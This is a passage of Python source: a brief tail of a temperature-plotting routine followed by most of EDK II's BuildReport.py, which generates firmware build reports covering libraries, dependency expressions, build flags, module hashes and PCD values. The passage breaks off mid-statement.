self.xdata["HLT"].append(fullstatus["timestamp"]) self.ydata["HLT"].append(float(fullstatus["HLT"]["temp"])) self.xdata["MLT"].append(fullstatus["timestamp"]) self.ydata["MLT"].append(float(fullstatus["MLT"]["temp"])) #print self.ydata self.xdata["MLTSET"].append(fullstatus["timestamp"]) self.ydata["MLTSET"].append(float(fullstatus["MLT"]["setpoint"])) #print self.ydata self.xdata["HLTSET"].append(fullstatus["timestamp"]) self.ydata["HLTSET"].append(float(fullstatus["HLT"]["setpoint"])) #print self.ydata self.plot.update_plot(self.xdata, self.ydata) def run(self): self.running=True
BuildReport.py
## @file # Routines for generating build report. # # This module contains the functionality to generate build report after # build all target completes successfully. # # Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR> # This program and the accompanying materials # are licensed and made available under the terms and conditions of the BSD License # which accompanies this distribution. The full text of the license may be found at # http://opensource.org/licenses/bsd-license.php # # THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. # ## Import Modules # import Common.LongFilePathOs as os import re import platform import textwrap import traceback import sys import time import struct import hashlib import subprocess import threading from datetime import datetime from StringIO import StringIO from Common import EdkLogger from Common.Misc import SaveFileOnChange from Common.Misc import GuidStructureByteArrayToGuidString from Common.Misc import GuidStructureStringToGuidString from Common.InfClassObject import gComponentType2ModuleType from Common.BuildToolError import FILE_WRITE_FAILURE from Common.BuildToolError import CODE_ERROR from Common.BuildToolError import COMMAND_FAILURE from Common.BuildToolError import FORMAT_INVALID from Common.LongFilePathSupport import OpenLongFilePath as open from Common.MultipleWorkspace import MultipleWorkspace as mws import Common.GlobalData as GlobalData from AutoGen.AutoGen import ModuleAutoGen from Common.Misc import PathClass from Common.String import NormPath from Common.DataType import * import collections from Common.Expression import * ## Pattern to extract contents in EDK DXS files gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL) ## Pattern to find total FV total size, occupied size in flash report intermediate file gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)") gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)") ## Pattern to find module size and time stamp in module summary report intermediate file gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)") gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)") ## Pattern to find GUID value in flash description files gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)") ## Pattern to collect offset, GUID value pair in the flash report intermediate file gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)") ## Pattern to find module base address and entry point in fixed flash map file gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)" gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"}) ## Pattern to find all module referenced header files in source files gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]') gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]") ## Pattern to find the entry point for EDK module using EDKII Glue library gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)") ## Tags for MaxLength of line in report gLineMaxLength = 120 ## Tags for end of line in report gEndOfLine = "\r\n" ## Tags for section start, end and separator gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<" gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n" gSectionSep = "=" * gLineMaxLength ## Tags for subsection start, 
end and separator gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<" gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">" gSubSectionSep = "-" * gLineMaxLength ## The look up table to map PCD type to pair of report display type and DEC type gPcdTypeMap = { 'FixedAtBuild' : ('FIXED', 'FixedAtBuild'), 'PatchableInModule': ('PATCH', 'PatchableInModule'), 'FeatureFlag' : ('FLAG', 'FeatureFlag'), 'Dynamic' : ('DYN', 'Dynamic'), 'DynamicHii' : ('DYNHII', 'Dynamic'), 'DynamicVpd' : ('DYNVPD', 'Dynamic'), 'DynamicEx' : ('DEX', 'DynamicEx'), 'DynamicExHii' : ('DEXHII', 'DynamicEx'), 'DynamicExVpd' : ('DEXVPD', 'DynamicEx'), } ## The look up table to map module type to driver type gDriverTypeMap = { 'SEC' : '0x3 (SECURITY_CORE)', 'PEI_CORE' : '0x4 (PEI_CORE)', 'PEIM' : '0x6 (PEIM)', 'DXE_CORE' : '0x5 (DXE_CORE)', 'DXE_DRIVER' : '0x7 (DRIVER)', 'DXE_SAL_DRIVER' : '0x7 (DRIVER)', 'DXE_SMM_DRIVER' : '0x7 (DRIVER)', 'DXE_RUNTIME_DRIVER': '0x7 (DRIVER)', 'UEFI_DRIVER' : '0x7 (DRIVER)', 'UEFI_APPLICATION' : '0x9 (APPLICATION)', 'SMM_CORE' : '0xD (SMM_CORE)', 'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers 'MM_STANDALONE' : '0xE (MM_STANDALONE)', 'MM_CORE_STANDALONE' : '0xF (MM_CORE_STANDALONE)' } ## The look up table of the supported opcode in the dependency expression binaries gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"] ## # Writes a string to the file object. # # This function writes a string to the file object and a new line is appended # afterwards. It may optionally wraps the string for better readability. # # @File The file object to write # @String The string to be written to the file # @Wrapper Indicates whether to wrap the string # def FileWrite(File, String, Wrapper=False): if Wrapper: String = textwrap.fill(String, 120) File.write(String + gEndOfLine) def ByteArrayForamt(Value): IsByteArray = False SplitNum = 16 ArrayList = [] if Value.startswith('{') and Value.endswith('}'): Value = Value[1:-1] ValueList = Value.split(',') if len(ValueList) >= SplitNum: IsByteArray = True if IsByteArray: if ValueList: Len = len(ValueList)/SplitNum for i, element in enumerate(ValueList): ValueList[i] = '0x%02X' % int(element.strip(), 16) if Len: Id = 0 while (Id <= Len): End = min(SplitNum*(Id+1), len(ValueList)) Str = ','.join(ValueList[SplitNum*Id : End]) if End == len(ValueList): Str += '}' ArrayList.append(Str) break else: Str += ',' ArrayList.append(Str) Id += 1 else: ArrayList = [Value + '}'] return IsByteArray, ArrayList ## # Find all the header file that the module source directly includes. # # This function scans source code to find all header files the module may # include. This is not accurate but very effective to find all the header # file the module might include with #include statement. # # @Source The source file name # @IncludePathList The list of include path to find the source file. # @IncludeFiles The dictionary of current found include files. 
# def FindIncludeFiles(Source, IncludePathList, IncludeFiles): FileContents = open(Source).read() # # Find header files with pattern #include "XXX.h" or #include <XXX.h> # for Match in gIncludePattern.finditer(FileContents): FileName = Match.group(1).strip() for Dir in [os.path.dirname(Source)] + IncludePathList: FullFileName = os.path.normpath(os.path.join(Dir, FileName)) if os.path.exists(FullFileName): IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName break # # Find header files with pattern like #include EFI_PPI_CONSUMER(XXX) # for Match in gIncludePattern2.finditer(FileContents): Key = Match.group(2) Type = Match.group(1) if "ARCH_PROTOCOL" in Type: FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "PROTOCOL" in Type: FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "PPI" in Type: FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "GUID" in Type: FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key} else: continue for Dir in IncludePathList: FullFileName = os.path.normpath(os.path.join(Dir, FileName)) if os.path.exists(FullFileName): IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName break ## Split each lines in file # # This method is used to split the lines in file to make the length of each line # less than MaxLength. # # @param Content The content of file # @param MaxLength The Max Length of the line # def FileLinesSplit(Content=None, MaxLength=None): ContentList = Content.split(TAB_LINE_BREAK) NewContent = '' NewContentList = [] for Line in ContentList: while len(Line.rstrip()) > MaxLength: LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength) LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength) LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength) if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0: LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) else: LineBreakIndex = MaxLength NewContentList.append(Line[:LineBreakIndex]) Line = Line[LineBreakIndex:] if Line: NewContentList.append(Line) for NewLine in NewContentList: NewContent += NewLine + TAB_LINE_BREAK NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine) return NewContent ## # Parse binary dependency expression section # # This utility class parses the dependency expression section and translate the readable # GUID name and value. # class DepexParser(object): ## # Constructor function for class DepexParser # # This constructor function collect GUID values so that the readable # GUID name can be translated. # # @param self The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self._GuidDb = {} for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: for Protocol in Package.Protocols: GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol]) self._GuidDb[GuidValue.upper()] = Protocol for Ppi in Package.Ppis: GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi]) self._GuidDb[GuidValue.upper()] = Ppi for Guid in Package.Guids: GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid]) self._GuidDb[GuidValue.upper()] = Guid ## # Parse the binary dependency expression files. # # This function parses the binary dependency expression file and translate it # to the instruction list. # # @param self The object pointer # @param DepexFileName The file name of binary dependency expression file. 
# def ParseDepexFile(self, DepexFileName): DepexFile = open(DepexFileName, "rb") DepexStatement = [] OpCode = DepexFile.read(1) while OpCode: Statement = gOpCodeList[struct.unpack("B", OpCode)[0]] if Statement in ["BEFORE", "AFTER", "PUSH"]: GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \ struct.unpack("=LHHBBBBBBBB", DepexFile.read(16)) GuidString = self._GuidDb.get(GuidValue, GuidValue) Statement = "%s %s" % (Statement, GuidString) DepexStatement.append(Statement) OpCode = DepexFile.read(1) return DepexStatement ## # Reports library information # # This class reports the module library subsection in the build report file. # class LibraryReport(object): ## # Constructor function for class LibraryReport # # This constructor function generates LibraryReport object for # a module. # # @param self The object pointer # @param M Module context information # def __init__(self, M): self.LibraryList = [] if int(str(M.AutoGenVersion), 0) >= 0x00010005: self._EdkIIModule = True else: self._EdkIIModule = False for Lib in M.DependentLibraryList: LibInfPath = str(Lib) LibClassList = Lib.LibraryClass[0].LibraryClass LibConstructorList = Lib.ConstructorList LibDesstructorList = Lib.DestructorList LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType] for LibAutoGen in M.LibraryAutoGenList: if LibInfPath == LibAutoGen.MetaFile.Path: LibTime = LibAutoGen.BuildTime break self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime)) ## # Generate report for module library information # # This function generates report for the module library. # If the module is EDKII style one, the additional library class, library # constructor/destructor and dependency expression may also be reported. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): if len(self.LibraryList) > 0: FileWrite(File, gSubSectionStart) FileWrite(File, TAB_BRG_LIBRARY) FileWrite(File, gSubSectionSep) for LibraryItem in self.LibraryList: LibInfPath = LibraryItem[0] FileWrite(File, LibInfPath) # # Report library class, library constructor and destructor for # EDKII style module. # if self._EdkIIModule: LibClass = LibraryItem[1] EdkIILibInfo = "" LibConstructor = " ".join(LibraryItem[2]) if LibConstructor: EdkIILibInfo += " C = " + LibConstructor LibDestructor = " ".join(LibraryItem[3]) if LibDestructor: EdkIILibInfo += " D = " + LibDestructor LibDepex = " ".join(LibraryItem[4]) if LibDepex: EdkIILibInfo += " Depex = " + LibDepex if LibraryItem[5]: EdkIILibInfo += " Time = " + LibraryItem[5] if EdkIILibInfo: FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo)) else: FileWrite(File, "{%s}" % LibClass) FileWrite(File, gSubSectionEnd) ## # Reports dependency expression information # # This class reports the module dependency expression subsection in the build report file. # class DepexReport(object): ## # Constructor function for class DepexReport # # This constructor function generates DepexReport object for # a module. If the module source contains the DXS file (usually EDK # style module), it uses the dependency in DXS file; otherwise, # it uses the dependency expression from its own INF [Depex] section # and then merges with the ones from its dependent library INF. 
# # @param self The object pointer # @param M Module context information # def __init__(self, M): self.Depex = "" self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex") ModuleType = M.ModuleType if not ModuleType: ModuleType = gComponentType2ModuleType.get(M.ComponentType, "") if ModuleType in ["SEC", "PEI_CORE", "DXE_CORE", "SMM_CORE", "MM_CORE_STANDALONE", "UEFI_APPLICATION"]: return for Source in M.SourceFileList: if os.path.splitext(Source.Path)[1].lower() == ".dxs": Match = gDxsDependencyPattern.search(open(Source.Path).read()) if Match: self.Depex = Match.group(1).strip() self.Source = "DXS" break else: self.Depex = M.DepexExpressionList.get(M.ModuleType, "") self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType]) if not self.ModuleDepex: self.ModuleDepex = "(None)" LibDepexList = [] for Lib in M.DependentLibraryList: LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip() if LibDepex != "": LibDepexList.append("(" + LibDepex + ")") self.LibraryDepex = " AND ".join(LibDepexList) if not self.LibraryDepex: self.LibraryDepex = "(None)" self.Source = "INF" ## # Generate report for module dependency expression information # # This function generates report for the module dependency expression. # # @param self The object pointer # @param File The file object for report # @param GlobalDepexParser The platform global Dependency expression parser object # def GenerateReport(self, File, GlobalDepexParser): if not self.Depex: return FileWrite(File, gSubSectionStart) if os.path.isfile(self._DepexFileName): try: DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName) FileWrite(File, "Final Dependency Expression (DEPEX) Instructions") for DepexStatement in DepexStatements: FileWrite(File, " %s" % DepexStatement) FileWrite(File, gSubSectionSep) except: EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName) FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source) if self.Source == "INF": FileWrite(File, "%s" % self.Depex, True) FileWrite(File, gSubSectionSep) FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True) FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True) else: FileWrite(File, "%s" % self.Depex) FileWrite(File, gSubSectionEnd) ## # Reports dependency expression information # # This class reports the module build flags subsection in the build report file. # class BuildFlagsReport(object): ## # Constructor function for class BuildFlagsReport # # This constructor function generates BuildFlagsReport object for # a module. It reports the build tool chain tag and all relevant # build flags to build the module. # # @param self The object pointer # @param M Module context information # def __init__(self, M): BuildOptions = {} # # Add build flags according to source file extension so that # irrelevant ones can be filtered out. 
# for Source in M.SourceFileList: Ext = os.path.splitext(Source.File)[1].lower() if Ext in [".c", ".cc", ".cpp"]: BuildOptions["CC"] = 1 elif Ext in [".s", ".asm"]: BuildOptions["PP"] = 1 BuildOptions["ASM"] = 1 elif Ext in [".vfr"]: BuildOptions["VFRPP"] = 1 BuildOptions["VFR"] = 1 elif Ext in [".dxs"]: BuildOptions["APP"] = 1 BuildOptions["CC"] = 1 elif Ext in [".asl"]: BuildOptions["ASLPP"] = 1 BuildOptions["ASL"] = 1 elif Ext in [".aslc"]: BuildOptions["ASLCC"] = 1 BuildOptions["ASLDLINK"] = 1 BuildOptions["CC"] = 1 elif Ext in [".asm16"]: BuildOptions["ASMLINK"] = 1 BuildOptions["SLINK"] = 1 BuildOptions["DLINK"] = 1 # # Save module build flags. # self.ToolChainTag = M.ToolChain self.BuildFlags = {} for Tool in BuildOptions: self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "") ## # Generate report for module build flags information # # This function generates report for the module build flags expression. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): FileWrite(File, gSubSectionStart) FileWrite(File, "Build Flags") FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag) for Tool in self.BuildFlags: FileWrite(File, gSubSectionSep) FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True) FileWrite(File, gSubSectionEnd) ## # Reports individual module information # # This class reports the module section in the build report file. # It comprises of module summary, module PCD, library, dependency expression, # build flags sections. # class ModuleReport(object): ## # Constructor function for class ModuleReport # # This constructor function generates ModuleReport object for # a separate module in a platform build. # # @param self The object pointer # @param M Module context information # @param ReportType The kind of report items in the final report file # def __init__(self, M, ReportType): self.ModuleName = M.Module.BaseName self.ModuleInfPath = M.MetaFile.File self.FileGuid = M.Guid self.Size = 0 self.BuildTimeStamp = None self.Hash = 0 self.DriverType = "" if not M.IsLibrary: ModuleType = M.ModuleType if not ModuleType: ModuleType = gComponentType2ModuleType.get(M.ComponentType, "") # # If a module complies to PI 1.1, promote Module type to "SMM_DRIVER" # if ModuleType == "DXE_SMM_DRIVER": PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000") if int(PiSpec, 0) >= 0x0001000A: ModuleType = "SMM_DRIVER" self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)") self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "") self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "") self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "") self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "") self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "") self.BuildTime = M.BuildTime self._BuildDir = M.BuildDir self.ModulePcdSet = {} if "PCD" in ReportType: # # Collect all module used PCD set: module INF referenced directly or indirectly. # It also saves module INF default values of them in case they exist. 
# for Pcd in M.ModulePcdList + M.LibraryPcdList: self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue)) self.LibraryReport = None if "LIBRARY" in ReportType: self.LibraryReport = LibraryReport(M) self.DepexReport = None if "DEPEX" in ReportType: self.DepexReport = DepexReport(M) if "BUILD_FLAGS" in ReportType: self.BuildFlagsReport = BuildFlagsReport(M) ## # Generate report for module information # # This function generates report for separate module expression # in a platform build. # # @param self The object pointer # @param File The file object for report # @param GlobalPcdReport The platform global PCD report object # @param GlobalPredictionReport The platform global Prediction report object # @param GlobalDepexParser The platform global Dependency expression parser object # @param ReportType The kind of report items in the final report file # def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType): FileWrite(File, gSectionStart) FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt") if os.path.isfile(FwReportFileName): try: FileContents = open(FwReportFileName).read() Match = gModuleSizePattern.search(FileContents) if Match: self.Size = int(Match.group(1)) Match = gTimeStampPattern.search(FileContents) if Match: self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1))) except IOError: EdkLogger.warn(None, "Fail to read report file", FwReportFileName) if "HASH" in ReportType: OutputDir = os.path.join(self._BuildDir, "OUTPUT") DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi") if os.path.isfile(DefaultEFIfile): Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp") # rebase the efi image since its base address may not zero cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile] try: PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) except Exception, X: EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0])) EndOfProcedure = threading.Event() EndOfProcedure.clear() if PopenObject.stderr: StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure)) StdErrThread.setName("STDERR-Redirector") StdErrThread.setDaemon(False) StdErrThread.start() # waiting for program exit PopenObject.wait() if PopenObject.stderr: StdErrThread.join() if PopenObject.returncode != 0: EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile)) if os.path.isfile(Tempfile): self.Hash = hashlib.sha1() buf = open(Tempfile, 'rb').read() if self.Hash.update(buf): self.Hash = self.Hash.update(buf) self.Hash = self.Hash.hexdigest() os.remove(Tempfile) FileWrite(File, "Module Summary") FileWrite(File, "Module Name: %s" % self.ModuleName) FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath) FileWrite(File, "File GUID: %s" % self.FileGuid) if self.Size: FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0)) if self.Hash: FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi")) if self.BuildTimeStamp: FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp) if self.BuildTime: FileWrite(File, "Module Build Time: %s" % self.BuildTime) if self.DriverType: FileWrite(File, "Driver Type: %s" % self.DriverType) if self.UefiSpecVersion: FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion) if self.PiSpecVersion: 
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion) if self.PciDeviceId: FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId) if self.PciVendorId: FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId) if self.PciClassCode: FileWrite(File, "PCI Class Code: %s" % self.PciClassCode) FileWrite(File, gSectionSep) if "PCD" in ReportType: GlobalPcdReport.GenerateReport(File, self.ModulePcdSet) if "LIBRARY" in ReportType: self.LibraryReport.GenerateReport(File) if "DEPEX" in ReportType: self.DepexReport.GenerateReport(File, GlobalDepexParser) if "BUILD_FLAGS" in ReportType: self.BuildFlagsReport.GenerateReport(File) if "FIXED_ADDRESS" in ReportType and self.FileGuid: GlobalPredictionReport.GenerateReport(File, self.FileGuid) FileWrite(File, gSectionEnd) def ReadMessage(From, To, ExitFlag): while True: # read one line a time Line = From.readline() # empty string means "end" if Line is not None and Line != "": To(Line.rstrip()) else: break if ExitFlag.isSet(): break ## # Reports platform and module PCD information # # This class reports the platform PCD section and module PCD subsection # in the build report file. # class PcdReport(object): ## # Constructor function for class PcdReport # # This constructor function generates PcdReport object a platform build. # It collects the whole PCD database from platform DSC files, platform # flash description file and package DEC files. # # @param self The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self.AllPcds = {} self.UnusedPcds = {} self.ConditionalPcds = {} self.MaxLen = 0 self.Arch = None if Wa.FdfProfile: self.FdfPcdSet = Wa.FdfProfile.PcdDict else: self.FdfPcdSet = {} self.DefaultStoreSingle = True self.SkuSingle = True if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1: self.DefaultStoreSingle = False if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1: self.SkuSingle = False self.ModulePcdOverride = {} for Pa in Wa.AutoGenObjectList: self.Arch = Pa.Arch # # Collect all platform referenced PCDs and grouped them by PCD token space # GUID C Names # for Pcd in Pa.AllPcdList: PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) if len(Pcd.TokenCName) > self.MaxLen: self.MaxLen = len(Pcd.TokenCName) # # Collect the PCD defined in DSC/FDF file, but not used in module # UnusedPcdFullList = [] for item in Pa.Platform.Pcds: Pcd = Pa.Platform.Pcds[item] if not Pcd.Type: # check the Pcd in FDF file, whether it is used in module first for T in ["FixedAtBuild", "PatchableInModule", "FeatureFlag", "Dynamic", "DynamicEx"]: PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, []) if Pcd in PcdList: Pcd.Type = T break if not Pcd.Type: PcdTypeFlag = False for package in Pa.PackageList: for T in ["FixedAtBuild", "PatchableInModule", "FeatureFlag", "Dynamic", "DynamicEx"]: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds: Pcd.Type = T PcdTypeFlag = True if not Pcd.DatumType: Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType break if PcdTypeFlag: break if not Pcd.DatumType: PcdType = Pcd.Type # Try to remove Hii and Vpd suffix if PcdType.startswith("DynamicEx"): PcdType = "DynamicEx" elif PcdType.startswith("Dynamic"): PcdType = "Dynamic" for package in Pa.PackageList: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds: Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType break PcdList = 
self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList and Pcd not in UnusedPcdFullList: UnusedPcdFullList.append(Pcd) if len(Pcd.TokenCName) > self.MaxLen: self.MaxLen = len(Pcd.TokenCName) if GlobalData.gConditionalPcds: for PcdItem in GlobalData.gConditionalPcds: if '.' in PcdItem: (TokenSpaceGuidCName, TokenCName) = PcdItem.split('.') if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds.keys(): Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)] PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) UnusedPcdList = [] if UnusedPcdFullList: for Pcd in UnusedPcdFullList: if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds: continue UnusedPcdList.append(Pcd) for Pcd in UnusedPcdList: PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) for Module in Pa.Platform.Modules.values(): # # Collect module override PCDs # for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList: TokenCName = ModulePcd.TokenCName TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName ModuleDefault = ModulePcd.DefaultValue ModulePath = os.path.basename(Module.M.MetaFile.File) self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault # # Collect PCD DEC default value. # self.DecPcdDefault = {} self._GuidDict = {} for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: Guids = Package.Guids self._GuidDict.update(Guids) for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds: DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue) # # Collect PCDs defined in DSC common section # self.DscPcdDefault = {} for Pa in Wa.AutoGenObjectList: for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds: DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue if DscDefaultValue: self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue def GenerateReport(self, File, ModulePcdSet): if self.ConditionalPcds: self.GenerateReportDetail(File, ModulePcdSet, 1) if self.UnusedPcds: self.GenerateReportDetail(File, ModulePcdSet, 2) self.GenerateReportDetail(File, ModulePcdSet) ## # Generate report for PCD information # # This function generates report for separate module expression # in a platform build. 
# # @param self The object pointer # @param File The file object for report # @param ModulePcdSet Set of all PCDs referenced by module or None for # platform PCD report # @param ReportySubType 0 means platform/module PCD report, 1 means Conditional # directives section report, 2 means Unused Pcds section report # @param DscOverridePcds Module DSC override PCDs set # def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0): PcdDict = self.AllPcds if ReportSubType == 1: PcdDict = self.ConditionalPcds elif ReportSubType == 2: PcdDict = self.UnusedPcds if ModulePcdSet is None: FileWrite(File, gSectionStart) if ReportSubType == 1: FileWrite(File, "Conditional Directives used by the build system") elif ReportSubType == 2: FileWrite(File, "PCDs not used by modules or in conditional directives") else: FileWrite(File, "Platform Configuration Database Report") FileWrite(File, " *B - PCD override in the build option") FileWrite(File, " *P - Platform scoped PCD override in DSC file") FileWrite(File, " *F - Platform scoped PCD override in FDF file") if not ReportSubType: FileWrite(File, " *M - Module scoped PCD override") FileWrite(File, gSectionSep) else: if not ReportSubType and ModulePcdSet: # # For module PCD sub-section # FileWrite(File, gSubSectionStart) FileWrite(File, TAB_BRG_PCD) FileWrite(File, gSubSectionSep) for Key in PcdDict: # # Group PCD by their token space GUID C Name # First = True for Type in PcdDict[Key]: # # Group PCD by their usage type # TypeName, DecType = gPcdTypeMap.get(Type, ("", Type)) for Pcd in PcdDict[Key][Type]: PcdTokenCName = Pcd.TokenCName MixedPcdFlag = False if GlobalData.MixedPcd: for PcdKey in GlobalData.MixedPcd: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]: PcdTokenCName = PcdKey[0] MixedPcdFlag = True if MixedPcdFlag and not ModulePcdSet: continue # # Get PCD default value and their override relationship # DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType)) DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName)) DscDefaultValBak = DscDefaultValue DscDefaultValue = self.FdfPcdSet.get((Pcd.TokenCName, Key), DscDefaultValue) if DscDefaultValue != DscDefaultValBak: try: DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True) except BadExpression, DscDefaultValue: EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, 